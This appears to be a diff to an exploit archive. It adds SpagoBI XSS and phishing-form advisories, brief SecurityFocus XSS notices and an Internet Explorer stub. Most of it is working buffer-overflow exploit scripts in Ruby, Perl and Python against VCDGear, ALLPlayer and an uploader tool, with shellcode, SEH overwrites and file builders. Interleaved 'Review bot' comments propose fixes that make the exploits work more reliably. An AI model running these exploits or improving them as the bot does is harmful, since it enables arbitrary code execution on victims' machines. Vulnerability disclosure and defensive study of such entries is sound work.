@@ -0,0 +1,122 @@ +################################################### +01. ### Advisory Information ### + +Title: Persistent Cross-Site Scripting (XSS) in SpagoBI +Date published: 2014-03-01 +Date of last update: 2014-03-01 +Vendors contacted: Engineering Group +Discovered by: Christian Catalano +Severity: High + + +02. ### Vulnerability Information ### + +CVE reference: CVE-2013-6232 +CVSS v2 Base Score: 4 +CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N) +Component/s: SpagoBI +Class: Input Manipulation + + +03. ### Introduction ### + +SpagoBI[1] is an Open Source Business Intelligence suite, belonging to +the free/open source SpagoWorld initiative, founded and supported by +Engineering Group[2]. +It offers a large range of analytical functions, a highly functional +semantic layer often absent in other open source platforms and projects, +and a respectable set of advanced data visualization features including +geospatial analytics. +[3]SpagoBI is released under the Mozilla Public License, allowing its +commercial use. +SpagoBI is hosted on OW2 Forge[4] managed by OW2 Consortium, an +independent open-source software community. + +[1] - http://www.spagobi.org +[2] - http://www.eng.it +[3] - +http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012 +[4] - http://forge.ow2.org/projects/spagobi + + +04. ### Vulnerability Description ### + +SpagoBI contains a flaw that allows persistent cross-site scripting +(XSS) attacks. This flaw exists because the application does not +validate certain unspecified input before returning it to the user. This +may allow an attacker to create a specially crafted request that would +execute arbitrary script code in a user's browser within the trust +relationship between their browser and the server. + + +05. ### Technical Description / Proof of Concept Code ### + +In execution page can be visible a toolbar with various icons useful for +the user to perform actions related to the document runs. 
+The user can insert a note about the executed document. +The note is associated to the document with relative parameters value +and to the user. +It can be public or private, so public notes are visible to all users +while the private notes are visible only from the user creator. + +An attacker (a SpagoBI malicious user with a restricted account ) can +insert a note with jasvascript code: + + + +and save it in public mode. +The code execution happens when the victim (an unaware user) click on +annotate document detail. + +This is not the only way to add malicious code in the SpagoBI web app. + + +06. ### Business Impact ### + +Exploitation of the vulnerability requires low privileged application +user account but low or medium user interaction. +Successful exploitation of the vulnerability results in session +hijacking, client-side phishing, client-side external redirects or +malware loads and client-side manipulation of the vulnerable module context. + + +07. ### Systems Affected ### + +This vulnerability was tested against: SpagoBI 4.0 +Older versions are probably affected too, but they were not checked. + + +08. ### Vendor Information, Solutions and Workarounds ### + +This issue is fixed in SpagoBI v4.1, which can be downloaded from: + +http://forge.ow2.org/project/showfiles.php?group_id=204 + +Fixed by vendor [verified] + + +09. ### Credits ### + +This vulnerability has been discovered by: +Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com + + +10. ### Vulnerability History ### + +October 08th, 2013: Vulnerability identification +October 22th, 2013: Vendor notification to [SpagoBI Team] +November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team] +December 16th, 2013: Vendor Fix/Patch [SpagoBI Team] +January 16th, 2014: Fix/Patch Verified +March 01st, 2014: Vulnerability disclosure + + +11. 
### Disclaimer ### + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. +I accept no responsibility for any damage caused by the use or misuse of +this information. + +################################################### + diff --git a/platforms/php/webapps/32039.txt b/platforms/php/webapps/32039.txt new file mode 100755 index 000000000..f1aec7bc6 --- /dev/null +++ b/platforms/php/webapps/32039.txt 
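Review bot: `Severity: High` in the Advisory Information block of the new 32038.txt contradicts the advisory's own scoring, `CVSS v2 Base Score: 4` with vector `(AV:N/AC:L/Au:S/C:N/I:P/A:N)`, and the companion advisory 32039.txt in this commit carries the identical score and vector but states `Severity: Medium`; one of the two labels is wrong and the pair should agree. The proof-of-concept in section 05 also has no content between `insert a note with jasvascript code:` and `and save it in public mode`, which is likely markup stripped when this page was rendered but is worth confirming in the committed file, since without it the reproduction step is incomplete. `jasvascript` and `October 22th` in the same section are typos a follow-up could fix.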
@@ -0,0 +1,120 @@ +################################################### + +01. ### Advisory Information ### + +Title: Persistent HTML Script Insertion permits offsite-bound forms +Date published: 2014-03-01 +Date of last update: 2014-03-01 +Vendors contacted: Engineering Group +Discovered by: Christian Catalano +Severity: Medium + + +02. ### Vulnerability Information ### + +CVE reference: CVE-2013-6233 +CVSS v2 Base Score: 4 +CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N) +Component/s: SpagoBI +Class: Input Manipulation + + +03. ### Introduction ### + +SpagoBI[1] is an Open Source Business Intelligence suite, belonging to +the free/open source SpagoWorld initiative, founded and supported by +Engineering Group[2]. +It offers a large range of analytical functions, a highly functional +semantic layer often absent in other open source platforms and projects, +and a respectable set of advanced data visualization features including +geospatial analytics. +[3]SpagoBI is released under the Mozilla Public License, allowing its +commercial use. SpagoBI is hosted on OW2 Forge[4] managed by OW2 +Consortium, an independent open-source software community. + +[1] - http://www.spagobi.org +[2] - http://www.eng.it +[3] - +http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012 +[4] - http://forge.ow2.org/projects/spagobi + + +04. ### Vulnerability Description ### + +SpagoBI contains a flaw that allows persistent script insertion. +This may allow a remote attacker to inject HTML code including forms +that load on a remote site, which can allow the attacker to conduct a +phishing attack on a user and capture their credentials. + + +05. ### Technical Description / Proof of Concept Code ### + +The vulnerability is located in some SpagoBI input fields +(e.g.'Description' input field from 'Short document metadata') + +To reproduce the vulnerability, the attacker (a malicious user) can add +the malicious HTML script code: + +
+Username:
+Password:
+
+

+
+
+ +in 'Description' input field from 'Short document metadata' and click on +save button. +The code execution happens when the victim (an unaware user) click on +'Short document metadata'. + +This is not the only way to inject malicious HTML code in the SpagoBI +web app. + + +06. ### Business Impact ### + +Exploitation of the vulnerability requires low privileged application +user account but low or medium user interaction. Successful +exploitation of the vulnerability results in persistent phishing and +persistent external redirects. + + +07. ### Systems Affected ### + +This vulnerability was tested against: SpagoBI 4.0 +Older versions are probably affected too, but they were not checked. + + +08. ### Vendor Information, Solutions and Workarounds ### + +This issue is fixed in SpagoBI v4.1, which can be downloaded from: +http://forge.ow2.org/project/showfiles.php?group_id=204 + +Fixed by vendor [verified] + + +09. ### Credits ### + +This vulnerability has been discovered by: +Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com + + +10. ### Vulnerability History ### + +October 08th, 2013: Vulnerability identification +October 22th, 2013: Vendor notification to [SpagoBI Team] +November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team] +December 16th, 2013: Vendor Fix/Patch [SpagoBI Team] +January 16th, 2014: Fix/Patch Verified +March 01st, 2014: Vulnerability disclosure + + +11. ### Disclaimer ### + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. +I accept no responsibility for any damage caused by the use or misuse of +this information. + +################################################### diff --git a/platforms/php/webapps/32040.txt b/platforms/php/webapps/32040.txt new file mode 100755 index 000000000..ba989e7b3 --- /dev/null +++ b/platforms/php/webapps/32040.txt 
@@ -0,0 +1,136 @@ +################################################### + +01. ### Advisory Information ### + +Title: XSS File Upload +Date published: 2014-03-01 +Date of last update: 2014-03-01 +Vendors contacted: Engineering Group +Discovered by: Christian Catalano +Severity: Medium + + +02. ### Vulnerability Information ### + +CVE reference: CVE-2013-6234 +CVSS v2 Base Score: 4 +CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N) +Component/s: SpagoBI +Class: Input Manipulation + + +03. ### Introduction ### + +SpagoBI[1] is an Open Source Business Intelligence suite, belonging to +the free/open source SpagoWorld initiative, founded and supported by +Engineering Group[2]. +It offers a large range of analytical functions, a highly functional +semantic layer often absent in other open source platforms and projects, +and a respectable set of advanced data visualization features including +geospatial analytics. +[3]SpagoBI is released under the Mozilla Public License, allowing its +commercial use. SpagoBI is hosted on OW2 Forge[4] managed by OW2 +Consortium, an independent open-source software community. + +[1] - http://www.spagobi.org +[2] - http://www.eng.it +[3] - +http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012 +[4] - http://forge.ow2.org/projects/spagobi + + +04. ### Vulnerability Description ### + +SpagoBI contains a flaw that may allow a remote attacker to execute +arbitrary code. This flaw exists because the application does not +restrict uploading for specific file types from Worksheet designer +function. +This may allow a remote attacker to upload arbitrary files (e.g. .html +for XSS) that would execute arbitrary script code in a user's browser +within the trust relationship between their browser and the server or +more easily conduct more serious attacks. + + +05. 
### Technical Description / Proof of Concept Code ### + +An attacker (a SpagoBI malicious user with a restricted account) can +upload a file from Worksheet designer function. + +To reproduce the vulnerability follow the provided information and +steps below: + +- Using a browser log on to SpagoBI with restricted account (e.g. +Business User Account) +- Go on: Worksheet designer function +- Click on: Image and Choose image +- Upload malicious file and save it + +XSS Malicious File Upload Attack has been successfully completed! + +More details about SpagoBI Worksheet Engine and Worksheet designer +http://wiki.spagobi.org/xwiki/bin/view/spagobi_server/Worksheet#HWorksheetoverview + +(e.g. Malicious File: xss.html) + + + + + + + + + + + + +06. ### Business Impact ### + +Exploitation of the vulnerability requires low privileged application +user account but low or medium user interaction. Successful exploitation +of the vulnerability results in session hijacking, client-side phishing, +client-side external redirects or malware loads and client-side +manipulation of the vulnerable module context. + + +07. ### Systems Affected ### + +This vulnerability was tested against: SpagoBI 4.0 +Older versions are probably affected too, but they were not checked. + + +08. ### Vendor Information, Solutions and Workarounds ### + +This issue is fixed in SpagoBI v4.1, which can be downloaded from: +http://forge.ow2.org/project/showfiles.php?group_id=204 + +Fixed by vendor [verified] + + +09. ### Credits ### + +This vulnerability has been discovered by: +Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com + + +10. ### Vulnerability History ### + +October 09th, 2013: Vulnerability identification +October 22th, 2013: Vendor notification to [SpagoBI Team] +November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team] +December 16th, 2013: Vendor Fix/Patch [SpagoBI Team] +January 16th, 2014: Fix/Patch Verified +March 01st, 2014: Vulnerability disclosure + + +11. 
### Disclaimer ### + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. +I accept no responsibility for any damage caused by the use or misuse of +this information. + +################################################### + diff --git a/platforms/php/webapps/32045.txt b/platforms/php/webapps/32045.txt new file mode 100755 index 000000000..2357bdfde --- /dev/null +++ b/platforms/php/webapps/32045.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30178/info + +eSyndiCat is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +eSyndiCat Pro 2.2 is vulnerable; other versions may also be affected. + +http://www.example.com/register.php where username=">&email=">&password=">&password2=">&security_code=">®ister="> \ No newline at end of file diff --git a/platforms/php/webapps/32047.txt b/platforms/php/webapps/32047.txt new file mode 100755 index 000000000..e78a2e5f2 --- /dev/null +++ b/platforms/php/webapps/32047.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30184/info + +Hudson is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Hudson 1.223 is vulnerable; other versions may also be affected. + +http://www.example.com/hudson/search/?q="> \ No newline at end of file 
diff --git a/platforms/windows/local/31991.rb b/platforms/windows/local/31991.rb
new file mode 100755
index 000000000..07d389b0b
--- /dev/null
+++ b/platforms/windows/local/31991.rb
@@ -0,0 +1,66 @@
+#!/usr/bin/ruby
+
+'''
+# Author: Provensec www.provensec.com
+# Tested on XP SP3 / Windows 7
+
+# Description: VCDGEAR 3.50 is prone to a stack-based buffer overflow
+vulnerability because the application fails to perform adequate
+boundary-checks on user-supplied input.
+# An attacker can exploit this issue to execute arbitrary code in the
+context of the application. Failed exploit attempts will result in a
+denial-of-service condition.
+# Application vendor: VCDGear 3.50 -
+http://www.vcdgear.com/files/vcdgear350.zip
+
+# 0x00499a1e : pop ecx # pop ebp # ret 0x0c | startnull {PAGE_EXECUTE_READ}
+[vcdgear.exe]
+# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
+# SEH record (nseh field) at 0x0012f7a4 overwritten with normal pattern :
+0x35744134 (offset 580), followed by 1416 bytes of cyclic data
+# Project1!ScandataFinalize+0x441:
+# 00452ff9 c6841553fdffff00 mov byte ptr [ebp+edx-2ADh],0
+ss:0023:4112f660=??
+# 0:000> !exchain
+# 0012f7a4: 44434241
+# Invalid exception stack at 909006eb
+# 0:000> !exploitable
+# *** ERROR: Symbol file could not be found. Defaulted to export symbols
+for C:\WINDOWS\system32\USER32.dll -
+# *** ERROR: Symbol file could not be found. Defaulted to export symbols
+for C:\WINDOWS\system32\kernel32.dll -
+# Exploitability Classification: EXPLOITABLE
+'''
+
+shellcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4" +
+"\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff" +
+"\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3" +
+"\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7" +
+"\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc" +
+"\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e" +
+"\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31" +
+"\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2" +
+"\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe" +
+"\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba" +
+
+filename = "file.cue"
+header = " BINARY\n"
+header += " TRACK 01 MODE2\2352\n"
+header += " INDEX 01 00:00:00\n"
+
+nops = "\x90" * 20
+junk = "\x41" * 324
+nseh = "\xeb\x06\x90\x90"
+seh = "\x1e\x9a\x49\x00"
+padding = "D" * (1412-(nops.length+shellcode.length))
+
+data = "FILE \"" + junk + nseh + "ABCD" + nops + shellcode + padding + "\"" + header
+
+puts "[*] JUNK size: %i\n" % [junk.length]
+puts "[*] SHELLCODE size: %i\n" % [shellcode.length]
+puts "[*] PADDING size: %i" % [padding.length]
+
+File.open(filename, 'wb') do |fd|
+ fd.write data
+ puts "[*] FILE CREATED SUCCESSFULLY"
+end
diff --git a/platforms/windows/local/32041.pl b/platforms/windows/local/32041.pl
new file mode 100755
index 000000000..92ad838d6
--- /dev/null
+++ b/platforms/windows/local/32041.pl
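Review bot: The last shellcode line (`"\xfb\x65...\x0d\x2b\xba" +`) ends with a dangling `+`, so the expression continues across the blank line onto `filename = "file.cue"` and, as far as I can tell, the string "file.cue" ends up appended to `shellcode` (the buffer still totals 1744 bytes because `padding` is computed from `shellcode.length`, but the reported SHELLCODE size is 8 bytes too large and eight stray bytes trail the payload); drop the trailing `+` on that line. `header += " TRACK 01 MODE2\2352\n"` looks like a typo for the cue-sheet form `MODE2/2352`: in a double-quoted Ruby string `\235` is an octal escape, so the file gets byte 0x9D followed by "2" rather than "/2352". The `'''` ... `'''` header is not a comment in Ruby, it is parsed as adjacent single-quoted string literals and only survives because the text contains no apostrophe; an `=begin`/`=end` block or `#` lines would be the safe form.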
@@ -0,0 +1,64 @@
+?#-----------------------------------------------------------------------------#
+# Exploit Title: ALLPlayer 5.8.1 - (.m3u) Buffer Overflow (SEH) #
+# Date: Mar 1 2014 #
+# Exploit Author: Gabor Seljan #
+# Software Link: http://www.allplayer.org/download/allplayer #
+# Version: 5.8.1 #
+# Tested on: Windows 7 SP1 #
+#-----------------------------------------------------------------------------#
+
+# This application is still vulnerable to a buffer overflow, caused by improper
+# bounds checking of an URL given via menu or placed inside an M3U file.
+#
+# Credit to previous exploits:
+# + http://www.exploit-db.com/exploits/29798/ by Mike Czumak
+# + http://www.exploit-db.com/exploits/28855/ by metacom
+
+#!/usr/bin/perl
+
+use strict;
+use warnings;
+
+my $filename = "sploit.m3u";
+
+my $junk1 = "\x41" x 301; # Offset to SEH
+my $nSEH = "\x61\x50"; # POPAD # Venetian padding
+my $SEH = "\x50\x45"; # POP POP RET from ALLPlayer.exe
+my $junk2 = "\x42" x 700;
+
+my $align = "\x53". # PUSH EBX
+ "\x6e". # Venetian padding
+ "\x58". # POP EAX
+ "\x6e". # Venetian padding
+ "\x05\x14\x11". # ADD EAX,0x11001400
+ "\x6e". # Venetian padding
+ "\x2d\x13\x11". # SUB EAX,0x11001300
+ "\x6e". # Venetian padding
+ "\x50". # PUSH EAX
+ "\x6e". # Venetian padding
+ "\xc3"; # RET
+
+my $nops = "\x71" x 109;
+
+# msfpayload windows/exec cmd=calc.exe R
+# msfencode -e x86/unicode_mixed BufferRegister=EAX
+my $shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAh".
+"AAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLyXTI9pKPip".
+"S02iwuP1z2RDRkb2nP2kNrjlDKnrN4BkD2NHJofWPJLfNQyonQGPDlmloqSLyrNLmPy16ozmYqY7".
+"JBzPB2R72kqBLPrkMrmlZaj0Bka0d83UGP1dOZYqvpb04Ka8mH4KR8kpYqyCHcMlQ9DKmdDKM18V".
+"nQyolqEpdl91FojmzahGNXk01eYd9s3M8xMk1mmTbUYRr8dKNxldKQWcRFRklLpKBkaHKl9qwc2k".
+"itRk9qFp3Yq4O4mT1K1Ks1aI0Zb1KOGpR8QOPZrkMBJKTFqMRJkQBm3UgIipYpypNp38matKpoe7".
+"ioyE7KJP85vBQF0heVCeEm3mio7eMlYvsLiz3PikiP45ze7KPGJs1bpoBJKP0SkOiEqSaQBL33ln".
+"s5sH2E9pAA";
+
+my $sploit = $junk1.$nSEH.$SEH.$align.$nops.$shellcode.$junk2;
+
+open(FILE, ">$filename") || die "[-]Error:\n$!\n";
+print FILE "http://$sploit";
+close(FILE);
+
+print "\nExploit file created successfully [$filename]!\n\n";
+print "You can either:\n";
+print "\t1. Open the created $filename file directly with ALLPlayer\n";
+print "\t2. Open the crafted URL via menu by Open movie/sound -> Open URL\n\n";
+print "http://$sploit\n";
diff --git a/platforms/windows/local/32050.py b/platforms/windows/local/32050.py
new file mode 100755
index 000000000..61581694f
--- /dev/null
+++ b/platforms/windows/local/32050.py
@@ -0,0 +1,38 @@
+#exploit por Daniel - La Calavera
+#Email: Lacalavera@gmail.com
+# Para CracksLatinoS
+
+#relleno
+
+rell = "\x41"* 477
+rell1 = "\x42"* 4000
+
+head = "\x41"* 8
+head += "\x0d\x0a\x31\x0d\x0a"
+head1 = "\x0d\x0a"
+head2 = "170.1.1.0"
+head2 +="\x0d\x0a"
+head2 +="\x22"
+head2 += "C:\Archivos2de2programa\Uploader!\Uploader!23151EXE"
+head2 +="\x22"
+
+
+# shellcode para calc.exe
+
+shellcode = "\x33\xD2\xB2\x50\x80\xF2\x55\x52\xC6\x45"
+shellcode += "\x31\x63\xC6\x45\x32\x61\xC6\x45\x33\x6C"
+shellcode += "\xC6\x45\x34\x63\xC6\x45\x35\x2E\xC6\x45\x36\x65"
+shellcode += "\xC6\x45\x37\x78\xC6\x45\x38\x65\x88\x45"
+shellcode += "\x39\x8D\x45\x31\x50\xB9\x31\x75\x66\x31"
+shellcode += "\x81\xF1\x69\x4D\x26\x31\xFF\xe1"
+
+# Next SHE
+Nshe = "\xeb\x06\x90\x90"
+# POP POP RETN
+PPR = "\x38\xbf\x40\x00"
+
+explo = (head + rell + Nshe + PPR + shellcode + rell1 + head1 + head2)
+arch = open ("uploadpref.dat", "w")
+
+arch.write(explo)
+arch.close
diff --git a/platforms/windows/remote/32049.txt b/platforms/windows/remote/32049.txt
new file mode 100755
index 000000000..517949c68
--- /dev/null
+++ b/platforms/windows/remote/32049.txt
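Review bot: The first line of the file begins `?#---...` — if that `?` is really in the file and not a byte-order-mark artifact of the paste, perl treats a leading `?` as the start of a `?PATTERN?` match and the script will not compile, so it should be removed; the `#!/usr/bin/perl` line belongs on line 1 as well (on line 17 it is only a comment, which is harmless when the script is run as `perl 32041.pl`). `open(FILE, ">$filename") || die "[-]Error:\n$!\n";` uses a bareword handle with two-argument open; the lexical three-argument form `open(my $fh, '>', $filename) or die "[-]Error:\n$!\n";` with `print $fh "http://$sploit";` and `close($fh);` is the idiom that fits `use strict`. Since every byte written (`\x41`, `\x61\x50`, `\x50\x45`, the align stub, `\x71` and the alphanumeric shellcode) avoids `\x0a`, the missing `binmode` does not corrupt the file here, but adding `binmode($fh);` would make that robustness explicit rather than accidental.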
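Review bot: `arch = open ("uploadpref.dat", "w")` opens the output in text mode, so on Windows — the platform this local exploit targets — every `\x0a` in `head`, `head1` and `head2` is written as `\x0d\x0a`; `head` alone grows by two bytes, which pushes the `Nshe`/`PPR` overwrite two bytes past the 477-byte offset the file was laid out for. Under Python 2, which the script's byte-string handling assumes, `with open("uploadpref.dat", "wb") as arch:` / `arch.write(explo)` fixes that and also replaces `arch.close`, which is a bare attribute reference and never actually calls close. `"C:\Archivos2de2programa\Uploader!\Uploader!23151EXE"` keeps its backslashes only because `\A` and `\U` are unrecognized escapes in a Python 2 str; Python 3 rejects `\U` without eight hex digits as a SyntaxError, so a raw string `r"C:\Archivos2de2programa\Uploader!\Uploader!23151EXE"` is the safe spelling. A one-line header comment naming the application that reads `uploadpref.dat` (the file name and the `Uploader!` path suggest it, but the script never says) would help whoever has to reproduce this.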
@@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/30219/info + +Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability. + +Remote attackers can exploit this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed. + + \ No newline at end of file